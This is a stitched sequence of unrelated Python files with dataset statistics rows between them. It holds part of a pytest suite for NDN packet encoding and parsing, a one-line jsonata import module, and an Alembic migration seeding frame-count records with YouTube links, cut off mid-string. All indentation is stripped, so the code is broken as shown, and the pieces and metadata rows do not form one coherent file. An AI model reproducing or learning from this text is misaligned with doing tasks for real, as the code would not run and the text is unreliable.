interest, final_name = make_interest(name, InterestParam(), app_param, need_final_name=True)
assert (interest ==
b'\x05\x42\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')
assert (final_name
== Name.decode(b'\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10')[0])
name = '/test/params-sha256=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF/ndn'
interest = make_interest(name, InterestParam(), app_param)
assert (interest ==
b'\x05\x39\x07\x2d\x08\x04test'
b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
b'\x08\x03ndn'
b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')
@staticmethod
def test_signed_interest():
name = '/local/ndn/prefix'
app_param = b'\x01\x02\x03\x04'
int_param = InterestParam()
int_param.nonce = 0x6c211166
interest = make_interest(name, int_param, app_param, signer=DigestSha256Signer())
assert (interest ==
b'\x05\x6f\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x8e\x6e\x36\xd7\xea\xbc\xde\x43\x75\x61\x40\xc9\x0b\xda\x09\xd5'
b'\x00\xd2\xa5\x77\xf2\xf5\x33\xb5\x69\xf0\x44\x1d\xf0\xa7\xf9\xe2'
b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
b'\x24\x04\x01\x02\x03\x04'
b'\x2c\x03\x1b\x01\x00'
b'\x2e \xea\xa8\xf0\x99\x08\x63\x78\x95\x1d\xe0\x5f\xf1\xde\xbb\xc1\x18'
b'\xb5\x21\x8b\x2f\xca\xa0\xb5\x1d\x18\xfa\xbc\x29\xf5\x4d\x58\xff')
interest = make_interest(name, int_param, signer=DigestSha256Signer())
assert (interest ==
b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x40\x77\xa5\x70\x49\xd8\x38\x48\xb5\x25\xa4\x23\xab\x97\x8e\x64'
b'\x80\xf9\x6d\x5c\xa3\x8a\x80\xa5\xe2\xd6\xe2\x50\xa6\x17\xbe\x4f'
b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
b'\x24\x00'
b'\x2c\x03\x1b\x01\x00'
b'\x2e \x09\x4e\x00\x9d\x74\x59\x82\x5c\xa0\x2d\xaa\xb7\xad\x60\x48\x30'
b'\x39\x19\xd8\x99\x80\x25\xbe\xff\xa6\xf9\x96\x79\xd6\x5e\x9f\x62')
@staticmethod
def test_forwarding_hint():
name = '/local/ndn/prefix'
int_param = InterestParam()
int_param.nonce = 0x01020304
int_param.forwarding_hint = [
(0x87, '/name/A'),
(0x02, Name.from_str('/ndn/B')),
(0x12, b'\x07\x0d\x08\x0bshekkuenseu')
]
interest = make_interest(name, int_param)
assert (interest ==
b'\x05\x55\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x1e\x33'
b'\x1f\x0e\x1e\x01\x87\x07\x09\x08\x04name\x08\x01A'
b'\x1f\x0d\x1e\x01\x02\x07\x08\x08\x03ndn\x08\x01B'
b'\x1f\x12\x1e\x01\x12\x07\r\x08\x0bshekkuenseu'
b'\x0a\x04\x01\x02\x03\x04\x0c\x02\x0f\xa0')
@staticmethod
def test_throws():
with pytest.raises(ValueError):
make_interest("/invalid%%name", InterestParam())
with pytest.raises(TypeError):
make_interest("/ndn", InterestParam(lifetime=0.5))
with pytest.raises(TypeError):
make_interest("/ndn", InterestParam(forwarding_hint=[1, 2, 3]))
with pytest.raises(ValueError):
make_interest("/ndn", InterestParam(hop_limit=300))
with pytest.raises(ValueError):
make_interest("/params-sha256=4077", InterestParam())
with pytest.raises(ValueError):
make_interest("/params-sha256=4077", InterestParam(), b'')
class TestDataMake:
@staticmethod
def test_default():
name = Name.from_str('/local/ndn/prefix')
data = make_data(name, MetaInfo(), signer=DigestSha256Signer())
assert (data ==
b"\x06\x42\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
b"\x14\x03\x18\x01\x00"
b"\x16\x03\x1b\x01\x00"
b"\x17 \x7f1\xe4\t\xc5z/\x1d\r\xdaVh8\xfd\xd9\x94"
b"\xd8\'S\x13[\xd7\x15\xa5\x9d%^\x80\xf2\xab\xf0\xb5")
name = Name.encode(name)
data = make_data(name, MetaInfo(), b'01020304', signer=DigestSha256Signer())
assert (data ==
b'\x06L\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x14\x03\x18\x01\x00'
b'\x15\x0801020304'
b'\x16\x03\x1b\x01\x00'
b'\x17 \x94\xe9\xda\x91\x1a\x11\xfft\x02i:G\x0cO\xdd!'
b'\xe0\xc7\xb6\xfd\x8f\x9cn\xc5\x93{\x93\x04\xe0\xdf\xa6S')
name = '/local/ndn/prefix'
meta_info = MetaInfo()
data = make_data(name, meta_info)
assert (data ==
b"\x06\x1b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
b"\x14\x03\x18\x01\x00")
name = '/E'
meta_info = MetaInfo()
meta_info.content_type = None
data = make_data(name, meta_info, b'', signer=DigestSha256Signer())
assert data == bytes.fromhex("0630 0703080145"
"1400 1500 16031b0100"
"1720f965ee682c6973c3cbaa7b69e4c7063680f83be93a46be2ccc98686134354b66")
@staticmethod
def test_meta_info():
name = '/local/ndn/prefix/37=%00'
meta_info = MetaInfo()
meta_info.content_type = ContentType.BLOB
meta_info.freshness_period = 1000
meta_info.final_block_id = Component.from_sequence_num(2)
data = make_data(name, meta_info, signer=DigestSha256Signer())
assert (data ==
b"\x06\x4e\x07\x17\x08\x05local\x08\x03ndn\x08\x06prefix\x25\x01\x00"
b"\x14\x0c\x18\x01\x00\x19\x02\x03\xe8\x1a\x03\x25\x01\x02"
b"\x16\x03\x1b\x01\x00"
b"\x17 \x03\xb8,\x18\xffMw\x84\x86\xa5a\x94e\xcc\xdaQ\x15\xb7\xfb\x19\xab\x9d1lw\'\xdf\xac\x03#\xcad")
@staticmethod
def test_shrink_signature():
class ShrinkSigner(Signer):
def write_signature_info(self, signature_info):
pass
def get_signature_value_size(self) -> int:
return 10
def write_signature_value(self, wire: VarBinaryStr, contents: List[VarBinaryStr]) -> int:
return 5
name = '/test'
meta_info = MetaInfo(content_type=ContentType.BLOB)
data = make_data(name, meta_info, signer=ShrinkSigner())
assert data == b'\x06\x16\x07\x06\x08\x04test\x14\x03\x18\x01\x00\x16\x00\x17\x05\x00\x00\x00\x00\x00'
class TestInterestParse:
@staticmethod
def test_default():
interest = b'\x05\x1a\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix\x0c\x02\x0f\xa0'
name, params, app_params, sig = parse_interest(interest)
assert name == Name.from_str('/local/ndn/prefix')
assert app_params is None
assert not params.can_be_prefix
assert not params.must_be_fresh
assert params.nonce is None
assert params.lifetime == 4000
assert params.hop_limit is None
assert sig.signature_info is None
assert sig.signature_value_buf is None
assert sig.digest_value_buf is None
@staticmethod
def test_params():
interest = (b'\x05\x26\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x21\x00\x12\x00\x0a\x04\x00\x00\x00\x00\x0c\x01\x0a\x22\x01\x01')
name, params, app_params, sig = parse_interest(interest)
assert name == Name.from_str('/local/ndn/prefix')
assert app_params is None
assert params.can_be_prefix
assert params.must_be_fresh
assert params.nonce == 0
assert params.lifetime == 10
assert params.hop_limit == 1
assert sig.signature_info is None
assert sig.signature_value_buf is None
assert sig.digest_value_buf is None
@staticmethod
def test_app_param():
interest = (b'\x05\x42\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x47\x75\x6f\x21\xfe\x0e\xe2\x65\x14\x9a\xa2\xbe\x3c\x63\xc5\x38'
b'\xa7\x23\x78\xe9\xb0\xa5\x8b\x39\xc5\x91\x63\x67\xd3\x5b\xda\x10'
b'\x0c\x02\x0f\xa0\x24\x04\x01\x02\x03\x04')
name, params, app_params, sig = parse_interest(interest)
assert name == Name.from_str('/local/ndn/prefix'
'/params-sha256=47756f21fe0ee265149aa2be3c63c538a72378e9b0a58b39c5916367d35bda10')
assert app_params == b'\x01\x02\x03\x04'
assert not params.can_be_prefix
assert not params.must_be_fresh
assert params.nonce is None
assert params.lifetime == 4000
assert params.hop_limit is None
assert sig.signature_info is None
algo = hashlib.sha256()
algo.update(b'\x24\x04\x01\x02\x03\x04')
assert Component.get_value(name[-1]) == algo.digest()
algo = hashlib.sha256()
for part in sig.digest_covered_part:
algo.update(part)
assert sig.digest_value_buf == algo.digest()
@staticmethod
def test_signed_interest_1():
interest = (b'\x05\x6f\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x8e\x6e\x36\xd7\xea\xbc\xde\x43\x75\x61\x40\xc9\x0b\xda\x09\xd5'
b'\x00\xd2\xa5\x77\xf2\xf5\x33\xb5\x69\xf0\x44\x1d\xf0\xa7\xf9\xe2'
b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
b'\x24\x04\x01\x02\x03\x04'
b'\x2c\x03\x1b\x01\x00'
b'\x2e \xea\xa8\xf0\x99\x08\x63\x78\x95\x1d\xe0\x5f\xf1\xde\xbb\xc1\x18'
b'\xb5\x21\x8b\x2f\xca\xa0\xb5\x1d\x18\xfa\xbc\x29\xf5\x4d\x58\xff')
name, params, app_params, sig = parse_interest(interest)
assert name == Name.from_str("/local/ndn/prefix"
"/params-sha256=8e6e36d7eabcde43756140c90bda09d500d2a577f2f533b569f0441df0a7f9e2")
assert params.nonce == 0x6c211166
assert app_params == b'\x01\x02\x03\x04'
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
algo = hashlib.sha256()
for part in sig.digest_covered_part:
algo.update(part)
assert sig.digest_value_buf == algo.digest()
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
@staticmethod
def test_signed_interest_2():
interest = (b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x02 \x40\x77\xa5\x70\x49\xd8\x38\x48\xb5\x25\xa4\x23\xab\x97\x8e\x64'
b'\x80\xf9\x6d\x5c\xa3\x8a\x80\xa5\xe2\xd6\xe2\x50\xa6\x17\xbe\x4f'
b'\x0a\x04\x6c\x21\x11\x66\x0c\x02\x0f\xa0'
b'\x24\x00'
b'\x2c\x03\x1b\x01\x00'
b'\x2e \x09\x4e\x00\x9d\x74\x59\x82\x5c\xa0\x2d\xaa\xb7\xad\x60\x48\x30'
b'\x39\x19\xd8\x99\x80\x25\xbe\xff\xa6\xf9\x96\x79\xd6\x5e\x9f\x62')
name, params, app_params, sig = parse_interest(interest)
assert name == Name.from_str("/local/ndn/prefix"
"/params-sha256=4077a57049d83848b525a423ab978e6480f96d5ca38a80a5e2d6e250a617be4f")
assert params.nonce == 0x6c211166
assert app_params == b''
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
algo = hashlib.sha256()
for part in sig.digest_covered_part:
algo.update(part)
assert sig.digest_value_buf == algo.digest()
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
@staticmethod
def test_throws():
with pytest.raises(IndexError):
parse_interest(b'\x05\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix', True)
with pytest.raises(IndexError):
parse_interest(b'\x05\x6b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix', True)
with pytest.raises(ValueError):
parse_interest(b'\x06\x6b\x07\x36\x08\x05local\x08\x03ndn\x08\x06prefix', True)
with pytest.raises(DecodeError):
parse_interest(b'\x01\x00', False)
class TestDataParse:
@staticmethod
def test_default_1():
data = (b"\x06\x42\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
b"\x14\x03\x18\x01\x00"
b"\x16\x03\x1b\x01\x00"
b"\x17 \x7f1\xe4\t\xc5z/\x1d\r\xdaVh8\xfd\xd9\x94"
b"\xd8\'S\x13[\xd7\x15\xa5\x9d%^\x80\xf2\xab\xf0\xb5")
name, meta_info, content, sig = parse_data(data)
assert name == Name.from_str("/local/ndn/prefix")
assert meta_info.content_type == ContentType.BLOB
assert meta_info.freshness_period is None
assert meta_info.final_block_id is None
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
assert content is None
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
@staticmethod
def test_default_2():
data = (b'\x06L\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix'
b'\x14\x03\x18\x01\x00'
b'\x15\x0801020304'
b'\x16\x03\x1b\x01\x00'
b'\x17 \x94\xe9\xda\x91\x1a\x11\xfft\x02i:G\x0cO\xdd!'
b'\xe0\xc7\xb6\xfd\x8f\x9cn\xc5\x93{\x93\x04\xe0\xdf\xa6S')
name, meta_info, content, sig = parse_data(data)
assert name == Name.from_str("/local/ndn/prefix")
assert meta_info.content_type == ContentType.BLOB
assert meta_info.freshness_period is None
assert meta_info.final_block_id is None
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
assert content == b'01020304'
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
@staticmethod
def test_default_3():
data = (b"\x06\x1b\x07\x14\x08\x05local\x08\x03ndn\x08\x06prefix"
b"\x14\x03\x18\x01\x00")
name, meta_info, content, sig = parse_data(data)
assert name == Name.from_str("/local/ndn/prefix")
assert meta_info.content_type == ContentType.BLOB
assert meta_info.freshness_period is None
assert meta_info.final_block_id is None
assert sig.signature_info is None
assert content is None
assert sig.signature_value_buf is None
@staticmethod
def test_default_4():
data = bytes.fromhex("0630 0703080145"
"1400 1500 16031b0100"
"1720f965ee682c6973c3cbaa7b69e4c7063680f83be93a46be2ccc98686134354b66")
name, meta_info, content, sig = parse_data(data)
assert name == Name.from_str("/E")
assert meta_info.content_type is None
assert meta_info.freshness_period is None
assert meta_info.final_block_id is None
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
assert content == b''
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
@staticmethod
def test_meta_info():
data = (b"\x06\x4e\x07\x17\x08\x05local\x08\x03ndn\x08\x06prefix\x25\x01\x00"
b"\x14\x0c\x18\x01\x00\x19\x02\x03\xe8\x1a\x03\x25\x01\x02"
b"\x16\x03\x1b\x01\x00"
b"\x17 \x03\xb8,\x18\xffMw\x84\x86\xa5a\x94e\xcc\xdaQ\x15\xb7\xfb\x19\xab\x9d1lw\'\xdf\xac\x03#\xcad")
name, meta_info, content, sig = parse_data(data)
assert name == Name.from_str("/local/ndn/prefix/37=%00")
assert meta_info.content_type == ContentType.BLOB
assert meta_info.freshness_period == 1000
assert meta_info.final_block_id == Component.from_sequence_num(2)
assert sig.signature_info.signature_type == SignatureType.DIGEST_SHA256
assert content is None
algo = hashlib.sha256()
for part in sig.signature_covered_part:
algo.update(part)
assert sig.signature_value_buf == algo.digest()
| 45.111872 | 119 | 0.613948 | 2,683 | 19,759 | 4.414089 | 0.140887 | 0.022967 | 0.027358 | 0.043908 | 0.804864 | 0.775986 | 0.74601 | 0.717048 | 0.701934 | 0.65735 | 0 | 0.154714 | 0.250569 | 19,759 | 437 | 120 | 45.215103 | 0.645057 | 0.03735 | 0 | 0.668478 | 0 | 0.130435 | 0.317371 | 0.264379 | 0 | 0 | 0.002736 | 0 | 0.255435 | 1 | 0.065217 | false | 0.002717 | 0.013587 | 0.005435 | 0.097826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
674f39756110b4725329e9294de8ee0f8aa529b3 | 47 | py | Python | pyjsonata/__init__.py | qlyoung/pyjsonata | 70bc8e993d70cea3f8731e45761319ab89859fec | [
"MIT"
] | 10 | 2020-03-06T16:01:43.000Z | 2022-01-24T02:28:39.000Z | pyjsonata/__init__.py | qlyoung/pyjsonata | 70bc8e993d70cea3f8731e45761319ab89859fec | [
"MIT"
] | 1 | 2021-09-23T04:48:39.000Z | 2021-09-23T04:48:39.000Z | pyjsonata/__init__.py | qlyoung/pyjsonata | 70bc8e993d70cea3f8731e45761319ab89859fec | [
"MIT"
] | 1 | 2021-08-28T21:15:10.000Z | 2021-08-28T21:15:10.000Z | from .pyjsonata import jsonata, PyjsonataError
| 23.5 | 46 | 0.851064 | 5 | 47 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 47 | 1 | 47 | 47 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6751bb6d266304b9e951eb5e64ac7f5222225524 | 39,027 | py | Python | alembic/versions/554365813a89_add_25x25_records.py | mchen91/mismatch-bot | 60dfada418d4783601f036855533c08d439b7946 | [
"MIT"
] | null | null | null | alembic/versions/554365813a89_add_25x25_records.py | mchen91/mismatch-bot | 60dfada418d4783601f036855533c08d439b7946 | [
"MIT"
] | null | null | null | alembic/versions/554365813a89_add_25x25_records.py | mchen91/mismatch-bot | 60dfada418d4783601f036855533c08d439b7946 | [
"MIT"
] | null | null | null | """add 25x25 records
Revision ID: 554365813a89
Revises: a67c2dc410d2
Create Date: 2021-02-15 20:36:37.952280
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "554365813a89"
down_revision = "a67c2dc410d2"
branch_labels = None
depends_on = None
def upgrade():
from models import Character, Stage
from use_cases.aliases import add_char_stage_alias, add_player_alias
from use_cases.character import get_character_by_name
from use_cases.player import get_player_by_name
from use_cases.records import add_record, get_record
from use_cases.stage import get_stage_by_name
connection = op.get_bind()
Session = sa.orm.sessionmaker()
session = Session(bind=connection)
frames_raw = """787 583 215 485 570 530 502 559 227 455 716 746 797 623 581 476 441 0 472 651 0 283 193 536 379
848 477 178 490 512 521 478 532 227 445 660 735 659 567 507 398 416 559 436 646 805 299 178 534 400
765 680 193 533 674 602 504 563 236 465 683 712 681 761 691 641 507 0 550 755 733 337 209 644 413
1045 709 238 489 656 0 567 641 290 580 828 902 872 687 681 624 547 0 510 765 0 449 232 695 412
875 734 209 594 568 674 576 678 231 504 642 962 897 687 497 419 552 1077 546 799 555 364 182 683 420
835 634 173 483 593 433 501 574 246 446 703 772 761 587 547 452 465 0 458 631 0 338 205 580 435
967 732 239 560 598 0 503 669 301 513 751 877 824 651 675 671 409 0 535 717 790 407 193 681 398
786 630 221 476 542 549 400 445 235 466 572 718 697 644 484 539 384 895 379 559 0 356 149 525 355
0 899 255 582 851 598 631 703 282 587 819 1096 954 763 706 768 597 0 705 831 0 458 178 688 487
469 343 147 419 420 414 333 357 230 298 402 599 391 516 448 448 282 0 315 496 371 262 117 502 283
478 346 93 377 360 365 225 281 227 366 384 688 412 571 430 454 239 0 308 422 305 237 101 412 318
1018 720 235 511 627 586 572 665 289 552 759 779 825 670 642 427 532 0 553 764 987 407 197 715 517
1017 589 239 595 684 0 499 653 287 511 763 864 582 688 616 543 531 0 560 707 0 414 197 506 421
1077 797 261 641 646 702 631 719 252 492 725 959 896 689 716 630 551 0 571 831 749 478 244 763 478
598 520 178 503 445 529 495 529 227 444 517 682 660 659 453 346 430 684 432 654 559 330 145 538 392
927 530 196 560 475 501 499 574 243 479 651 754 613 605 673 360 414 819 535 593 969 396 173 492 402
527 383 157 307 379 356 405 407 210 237 415 482 574 320 330 340 210 732 328 400 402 242 123 418 327
433 349 147 316 295 298 359 359 203 234 360 359 535 287 289 284 227 291 248 309 274 246 115 357 320
870 583 193 479 436 449 522 478 239 411 563 592 736 459 419 381 449 670 328 477 886 297 170 595 433
658 452 191 447 385 434 448 394 223 346 468 550 564 425 419 359 345 0 327 410 529 281 146 476 317
1054 729 237 567 659 649 599 695 272 512 706 973 942 647 679 733 544 1108 522 816 440 418 235 655 505
692 580 202 468 476 499 475 501 239 400 512 688 691 582 500 474 407 640 406 603 682 273 148 539 317
776 573 223 501 527 480 501 538 231 415 531 698 683 614 571 430 442 0 433 661 0 345 169 604 309
890 599 215 517 567 525 522 567 216 447 583 790 779 623 535 572 456 0 419 613 779 354 172 497 357
940 623 206 477 534 564 520 595 218 479 598 829 776 590 578 568 465 0 446 699 0 297 188 586 317"""
videos_raw = """https://www.youtube.com/watch?v=7lNtSq50NHo https://www.youtube.com/watch?v=GK6WgnNKphg https://www.youtube.com/watch?v=gXTQLU1R_zM https://www.youtube.com/watch?v=7trfinFysLM https://www.youtube.com/watch?v=tO0qBNqH7jk https://www.youtube.com/watch?v=JzZMKfg31Fk https://www.youtube.com/watch?v=Hdain4KDv1c https://www.youtube.com/watch?v=QfwvRxLdIas https://www.youtube.com/watch?v=t7hkK2BIYzI https://www.youtube.com/watch?v=Padr42zMsoA https://www.youtube.com/watch?v=TC4zYAfGB4o https://www.youtube.com/watch?v=Plm_5O1U758 https://www.youtube.com/watch?v=qHkZlc6Fcc8 https://www.youtube.com/watch?v=6mvzq1PHzVk https://www.youtube.com/watch?v=83mWk3B5t3g https://www.youtube.com/watch?v=pIM8YkTmins https://www.youtube.com/watch?v=S71m5M2415o N/A https://www.youtube.com/watch?v=zZNxMHF58w8 https://www.youtube.com/watch?v=JgMPbTdpH54 N/A https://www.youtube.com/watch?v=2QlRgSg9amo https://www.youtube.com/watch?v=IRwawQr3drU https://www.youtube.com/watch?v=148P8iGfRa4 https://www.youtube.com/watch?v=2M5iHK9BGZA
https://www.youtube.com/watch?v=2rgQIgweCjE https://www.youtube.com/watch?v=L52InTj1kuk https://www.youtube.com/watch?v=YXmqV-0Nul4 https://www.youtube.com/watch?v=tTLkWqOkJzk https://www.youtube.com/watch?v=JTObCroXehU https://www.youtube.com/watch?v=WzouRoday0A https://www.youtube.com/watch?v=4Jd8dZM5x6w https://www.youtube.com/watch?v=2rgQIgweCjE&t=86s https://www.youtube.com/watch?v=ehb07oFyqq4 https://www.youtube.com/watch?v=QCwS7QpNn_c https://www.youtube.com/watch?v=2rgQIgweCjE&t=117s https://www.youtube.com/watch?v=2rgQIgweCjE&t=131s https://www.youtube.com/watch?v=aaw2Dk1MlzU https://www.youtube.com/watch?v=2rgQIgweCjE&t=161s https://www.youtube.com/watch?v=csanzdqk9yw https://www.youtube.com/watch?v=2rgQIgweCjE&t=187s https://www.youtube.com/watch?v=qkLSr1hJ0CA https://www.youtube.com/watch?v=c4KEM3GRxP8 https://www.youtube.com/watch?v=oe9UCF1fBoU https://www.youtube.com/watch?v=J7kjLMKTO_0 https://www.youtube.com/watch?v=FqwkV6OCPZM https://www.youtube.com/watch?v=L_bwf1meXKo https://www.youtube.com/watch?v=2rgQIgweCjE&t=258s https://www.youtube.com/watch?v=6PE3q6AGfXo https://www.youtube.com/watch?v=nT80gNrRnEM
https://www.youtube.com/watch?v=h9jcb-caI44 https://www.youtube.com/watch?v=wf7ckXdRvkc https://www.youtube.com/watch?v=kq1zJoKxkuM https://www.youtube.com/watch?v=T2-QWhm_KO8 https://www.youtube.com/watch?v=TR4JeyFO65I https://www.youtube.com/watch?v=xkQyKYnJaVw https://www.youtube.com/watch?v=QAnC52S3Li0 https://www.youtube.com/watch?v=uLnoFHbx90U https://www.youtube.com/watch?v=Odh_hv3FOSw https://www.youtube.com/watch?v=Cg36tDpAtiY https://www.youtube.com/watch?v=NfgAOYlivY0 https://www.youtube.com/watch?v=1ccgDvUIRkU https://www.youtube.com/watch?v=apDrTBAd8Zo https://www.youtube.com/watch?v=kxXEQS3992k https://www.youtube.com/watch?v=5pXOjN_WXtk https://www.youtube.com/watch?v=NMfDruGBpgY https://www.youtube.com/watch?v=lhuunJmmGLY N/A https://www.youtube.com/watch?v=DlLHFO3W2aw https://www.youtube.com/watch?v=zxbx1SokDsY https://www.youtube.com/watch?v=fFwaesMfFYA https://www.youtube.com/watch?v=UH-V4_0R62s https://www.youtube.com/watch?v=p8QXSRfoMJQ https://www.youtube.com/watch?v=gbnlzFKktBE https://www.youtube.com/watch?v=fwZpr9loTX0
https://www.youtube.com/watch?v=I-DXEZ_JHBQ https://www.youtube.com/watch?v=ZqyaclFr6i0 https://www.youtube.com/watch?v=-hG10yxiJeY https://www.youtube.com/watch?v=tR3Hq2f8oUY https://www.youtube.com/watch?v=9bzp5ymWFvc N/A https://www.youtube.com/watch?v=YxY1BtzyTiU https://youtu.be/Zn5mEFUbvCg?t=79 https://www.youtube.com/watch?v=0uf9cYMU1_w https://www.youtube.com/watch?v=BV0xMF8fV8M https://www.youtube.com/watch?v=LX2yjAZ12Xw https://www.youtube.com/watch?v=0qFfzvkykQQ https://www.youtube.com/watch?v=hCzW_DWegsk https://www.youtube.com/watch?v=EgISgvRdFQ0 https://www.youtube.com/watch?v=YZXgJJvryrw https://www.youtube.com/watch?v=dhNYnf2Bu9U https://www.youtube.com/watch?v=Cej1SpLnmgk N/A https://www.youtube.com/watch?v=-KbraYVPeeI https://www.youtube.com/watch?v=dwCZDvWN1CQ N/A https://www.youtube.com/watch?v=T8kFuqrjk1s https://www.youtube.com/watch?v=jrQ67YVLAa0 https://www.youtube.com/watch?v=HpR42mNRwkA https://www.youtube.com/watch?v=QVVkqIADIwk
https://www.youtube.com/watch?v=UPGtWfHZhKg https://www.youtube.com/watch?v=sBs3MdNDelM https://youtu.be/lfPxiK2CbMY?t=19 https://www.youtube.com/watch?v=R2GkTMiD8IQ https://www.youtube.com/watch?v=kVaG0PSzmrQ https://youtu.be/2Sj9wV8jlOw?t=42 https://www.youtube.com/watch?v=68qK07bYzp0 https://www.youtube.com/watch?v=r3lCx90q1PQ https://www.youtube.com/watch?v=Lo5nNJ4d9LA https://www.youtube.com/watch?v=bgP709-h6bY https://www.youtube.com/watch?v=LQLPWJHxels https://www.youtube.com/watch?v=0d14RZjO6v8 https://www.youtube.com/watch?v=QuxhHmWHQ1k https://www.youtube.com/watch?v=iJBP7gF50fs https://www.youtube.com/watch?v=JfQZAtQodXE https://www.youtube.com/watch?v=RRweGBqCmfA https://www.youtube.com/watch?v=_FxLF4n1uxw https://www.youtube.com/watch?v=f4n3KUQNSJQ https://www.youtube.com/watch?v=OP5Kc0hGfVo https://www.youtube.com/watch?v=K1MLGUo0iBE https://www.youtube.com/watch?v=iSAPQSJ7jzA https://www.youtube.com/watch?v=palz2WH4FGs https://www.youtube.com/watch?v=yJ2oC3pZstk https://www.youtube.com/watch?v=3oaTTEpPJO0 https://www.youtube.com/watch?v=YBCYY6R5DTk
https://www.youtube.com/watch?v=Yqip3A6pjtU https://www.youtube.com/watch?v=xUH0sv4f6z0 https://www.youtube.com/watch?v=3hsJqLkR_rE https://www.youtube.com/watch?v=gILlUUpBvbI https://www.youtube.com/watch?v=rTz0LJnr2W4 https://www.youtube.com/watch?v=LXUBF0GuWfQ https://www.youtube.com/watch?v=nowBl_q5w3w https://www.youtube.com/watch?v=AkWER7zd4_8 https://www.youtube.com/watch?v=BqaF4jp7mMw https://www.youtube.com/watch?v=C_SMwS0bLRo https://www.youtube.com/watch?v=LExTlb9mgbs https://www.youtube.com/watch?v=ZUK1tTETDTQ https://www.youtube.com/watch?v=Xd-FhyQpeDQ https://www.youtube.com/watch?v=I6_eaxG6Sj0 https://www.youtube.com/watch?v=mVrlS0Uq0F4 https://www.youtube.com/watch?v=HZCf-yzFEr4 https://www.youtube.com/watch?v=Ty0QLiGXpx4 N/A https://www.youtube.com/watch?v=Ktw0FaCM3nY https://www.youtube.com/watch?v=5DdtGLEIOmQ N/A https://www.youtube.com/watch?v=fMuFutsHURA https://www.youtube.com/watch?v=yJUi2Lt2rnA https://www.youtube.com/watch?v=fjnupMz0wD8 https://www.youtube.com/watch?v=XMj5cLxJ4xQ
